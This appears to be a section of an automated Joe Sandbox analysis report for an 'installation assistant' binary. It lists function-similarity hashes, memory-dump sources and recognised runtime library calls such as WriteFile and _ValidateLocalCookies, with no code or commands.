                                        • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                                        • Instruction ID: 3cb5be0459f65fc18314229f9564e28e2cf595d6705d6911191feb1dc4c4fbe6
                                        • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                                        • Instruction Fuzzy Hash: 65E1E6B18047A64FE398EF5CDCA4A3577A1EBC8300F4B427DDA650B392D734A942DB94
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                        • Instruction ID: 4a9148662c9ac85a864fa3e078bf8a87e321f0e57260448dd0b7cc4e68857ab7
                                        • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                        • Instruction Fuzzy Hash: DCC1D6352047418BC728CF39D1A4697BBE2EFE9314F148A6DC8CA4BB55DA34A40ECB65
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                                        • Instruction ID: 60362cf996325fc953d3122bc2b09ae0e40c5062a83c9e5a7787f93ec9230a78
                                        • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                                        • Instruction Fuzzy Hash: E5B16E75A012448FC350DF28C884284BBE2FF9522CB79869ED5948F646E336E947CBE1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                                        • Instruction ID: e3a3ebcb8e538cf19365a2dbeacc01261e57409a711b73bd05e9b041919758f1
                                        • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                                        • Instruction Fuzzy Hash: 4BD1F8B1848B9A5FD394EF4DEC81A357762AF88301F4A8239DB6007753D634BB12D794
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                        • Instruction ID: 53b006015772d70b96a6be83065121aab121a6fc472bfeff1ec46e1763ee6a95
                                        • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                        • Instruction Fuzzy Hash: C1B1C131309B054BD324DF3AC8907DAB7E1AF95708F14462DC5AB87B81EF31A619CB95
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                                        • Instruction ID: 20ace7075baf5ab593e88c4a44ae2f5b38333bfa855efe6f6ea9d8e7ca5924c7
                                        • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                                        • Instruction Fuzzy Hash: 4C6142B23082158FD318CF99E580A96B3E5EBA9321B1685BFE105CF361E775DC41CB28
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                        • Instruction ID: 23b8792fe9f67f1bc6b81d8cb5c2b79a6ab7df4c69326107a4301068ee7a7b9f
                                        • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                        • Instruction Fuzzy Hash: 4B918FB2C1971A8BD314CF18C88025AB7E0FB98308F09067DED99A7381D739EA55CBC5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                        • Instruction ID: 9117eb05a9d951320b693df654e216993feadfbd8fe4faddb415d63cb9734b18
                                        • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                        • Instruction Fuzzy Hash: 25519F72F146099BDF08CE98D9A17ADB7F1EB98304F248179D115E7B81D7789A41CB40
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                        • Instruction ID: 004697f8595dc0c7d42ae9754df75e5d914e1f360d48bf4209bb525e9be64299
                                        • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                        • Instruction Fuzzy Hash: 953114277A840103C70CCE3BCC1679F91535BE562A70ECF796C05DEF55D52CC8124144
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                        • Instruction ID: d4750270cd232acc956e3f39496154a03b9f7b51f6e4117fb59cbe4a38f288ef
                                        • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                        • Instruction Fuzzy Hash: B9310A73504A050EF221852989883977263DFD2368F2A87A9D97687FECCA71DA0781A1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                        • Instruction ID: 8285db5f5a2d5346ce1fd83d9709f6503fc51779f29642efbdcde9bd489dadcc
                                        • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                        • Instruction Fuzzy Hash: 174192B190970A8FD704CF19C89066AB3E4FF89318F454A6DE95A97381E334EA25CF91
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                        • Instruction ID: 63fef9bcced99aba0dbdc850f89bba6154ebe4e003413830998591785c74d273
                                        • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                        • Instruction Fuzzy Hash: 402128B1A047EA07E7209E6DCCD037577D29BC2305F094279DAB48FA87E17994A2D660
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                        • Instruction ID: 99a26870a675177c2e22d0d0c4f10ec5b1fd9cf309b18f94a0a8bbb6b6cbc647
                                        • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                        • Instruction Fuzzy Hash: 562137729144254BC301DF2EE888777B3E1FFD431DF638A2AE9928B581C628D848C6E0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                        • Instruction ID: c063ce42ffdf25386dc37ec2f7cfa64dcfd169094fad51872323f1bc60503139
                                        • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                        • Instruction Fuzzy Hash: 2121F732A011148FC741EF6AD98469BB3E6FFC8365F67CA3DDD8147745C631E60A86A0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                        • Instruction ID: 5b93505d0944bbd28e0cdb75c452644de7140c3681801e5b254237aa79e955b3
                                        • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                        • Instruction Fuzzy Hash: 4E01817291462E57DB189F48CC41136B390FB85312F49823ADD479B385E734F970C6D4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73b2c9c62382944de1616b5b6cc4261e3d9160605a97cdfc134f4d4d8cdd27bb
                                        • Instruction ID: b582f58ef9d89abc5c1e11b0751ff9cf61f5b141b5523e36bc66aa846b7e71ca
                                        • Opcode Fuzzy Hash: 73b2c9c62382944de1616b5b6cc4261e3d9160605a97cdfc134f4d4d8cdd27bb
                                        • Instruction Fuzzy Hash: F4F01C32A25324EBCF129A88C405B8972F8EB45B65F120096A505AB640C7B4EE409BD0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                        • Instruction ID: 27b7c54eb5953770e97a6f6115d744d7e92beb3f018496988b6269d356fe27ef
                                        • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                        • Instruction Fuzzy Hash: A1E08C72A12338EBCB15EF88C900E8AB3ECEB45A05B220496B501D3610D670EE00CBD0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                        • API String ID: 3519838083-609671
                                        • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction ID: 7865b96e59aa96583483558e8f843adaac20d1103eda7a5f271e5c98267cca84
                                        • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                        • Instruction Fuzzy Hash: 45D10639A04209DFCF11CFB4D990BEEB7B5FF15309F244059E455A3A50DB78AA89CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$H_prolog
                                        • String ID: >WJ$x$x
                                        • API String ID: 2300968129-3162267903
                                        • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction ID: e33a0365a2df44057f2b78608595da2dc0114758c1d5eba51e75b198ba34a44f
                                        • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                        • Instruction Fuzzy Hash: A2127A7190421DEFDF10DFA4C880AEDBBB5FF18318F208569E915ABA50DB3A9A45CF50
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 6C0C9B07
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0C9B0F
                                        • _ValidateLocalCookies.LIBCMT ref: 6C0C9B98
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0C9BC3
                                        • _ValidateLocalCookies.LIBCMT ref: 6C0C9C18
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                        • Instruction ID: 248b647b548985cc82dbf524d41ab9795b036e2e42ce8fb00be39b9ab36ca4e7
                                        • Opcode Fuzzy Hash: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                        • Instruction Fuzzy Hash: 0A418E34B10219ABCF00DF68C884BDEBBF5AF4521CF158155E8159BB51DB36AA05CF92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 0-537541572
                                        • Opcode ID: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                        • Instruction ID: f21468d2327a1c8a36667c154faf9d3c29340ae8e33a855014bdc6422798d3b2
                                        • Opcode Fuzzy Hash: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                        • Instruction Fuzzy Hash: 8221C632A56B31BBDB114B69CC40B0A36E89F07768F170A50EC25E7A80DB30FD0085E2
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                        • __fassign.LIBCMT ref: 6C0DC0D8
                                        • __fassign.LIBCMT ref: 6C0DC0F5
                                        • WriteFile.KERNEL32(?,6C0E5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC13D
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C0DC17D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC229
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                        • String ID:
                                        • API String ID: 4031098158-0
                                        • Opcode ID: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                        • Instruction ID: c6a783d8a3aa24b557a54ea31d28ae4ce6ea9288a7d22d1f334704c3e870e5b0
                                        • Opcode Fuzzy Hash: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                        • Instruction Fuzzy Hash: F4D19B75E012989FCF11CFE8C880AEDBBF5BF49314F25415AE856AB241D631AA46CF50
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                        • __Getctype.LIBCPMT ref: 6BF93084
                                        • std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                        • String ID:
                                        • API String ID: 1102183713-0
                                        • Opcode ID: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                        • Instruction ID: e9dd71bfa0bf4bc6e2a47e18f1249ae8981637b791f996d232dc01af1ec136ac
                                        • Opcode Fuzzy Hash: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                        • Instruction Fuzzy Hash: 90418DB2E042548FEB14DF98D854BAEBBF0FF44714F004159D829AB760D739AA04CF91
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aulldiv$__aullrem
                                        • String ID:
                                        • API String ID: 2022606265-0
                                        • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction ID: 46df268e7501fd47bc41ac3def7f9f26c10e0fb9678d60b13b5ed515b16c951c
                                        • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                        • Instruction Fuzzy Hash: AA219E70A01219BBDF208E948C80EDF7E69FF467A8F248626B52461694DA71CD60CAE5
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C10A6F1
                                          • Part of subcall function 6C119173: __EH_prolog.LIBCMT ref: 6C119178
                                        • __EH_prolog.LIBCMT ref: 6C10A8F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
